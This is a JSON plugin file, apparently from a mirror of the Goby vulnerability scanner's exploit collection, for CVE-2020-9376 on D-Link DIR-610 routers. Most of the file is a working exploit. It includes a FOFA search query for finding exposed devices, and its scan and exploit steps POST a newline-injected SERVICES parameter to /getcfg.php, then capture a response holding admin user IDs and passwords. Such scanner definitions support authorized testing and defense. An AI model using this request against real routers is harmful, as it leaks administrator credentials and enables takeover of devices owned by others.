mirror of https://github.com/qwqdanchun/Goby.git
105 lines
2.9 KiB
JSON
105 lines
2.9 KiB
JSON
{
|
|
"Name": "D-Link Dump Credentials (CVE-2020-9376)",
|
|
"Description": "** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
|
|
"Product": "D-Link-DIR-610",
|
|
"Homepage": "https://www.dlink.com.br/produto/dir-610/",
|
|
"DisclosureDate": "2020-07-09",
|
|
"Author": "itardc@163.com",
|
|
"FofaQuery": "title=\"D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME\" && (body=\"DIR-610\" || server=\"DIR-610\")",
|
|
"GobyQuery": "",
|
|
"Level": "2",
|
|
"Impact": "",
|
|
"Recommendation": "",
|
|
"References": [
|
|
"https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f",
|
|
"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182",
|
|
"https://www.dlink.com.br/produto/dir-610/",
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2020-9376",
|
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1",
|
|
"data_type": "text",
|
|
"follow_redirect": true,
|
|
"method": "POST",
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
},
|
|
"uri": "/getcfg.php"
|
|
},
|
|
"ResponseTest": {
|
|
"checks": [
|
|
{
|
|
"bz": "",
|
|
"operation": "==",
|
|
"type": "item",
|
|
"value": "200",
|
|
"variable": "$code"
|
|
},
|
|
{
|
|
"bz": "",
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "<name>Admin</name>",
|
|
"variable": "$body"
|
|
},
|
|
{
|
|
"bz": "",
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "</usrid>",
|
|
"variable": "$body"
|
|
},
|
|
{
|
|
"bz": "",
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "</password>",
|
|
"variable": "$body"
|
|
}
|
|
],
|
|
"operation": "AND",
|
|
"type": "group"
|
|
}
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1",
|
|
"data_type": "text",
|
|
"follow_redirect": true,
|
|
"method": "POST",
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
},
|
|
"uri": "/getcfg.php"
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody"
|
|
]
|
|
}
|
|
],
|
|
"Tags": ["infoleak"],
|
|
"CVEIDs": [
|
|
"CVE-2020-9376"
|
|
],
|
|
"CVSSScore": "7.5",
|
|
"AttackSurfaces": {
|
|
"Application": null,
|
|
"Support": null,
|
|
"Service": null,
|
|
"System": null,
|
|
"Hardware": ["D-Link-DIR-610"]
|
|
}
|
|
} |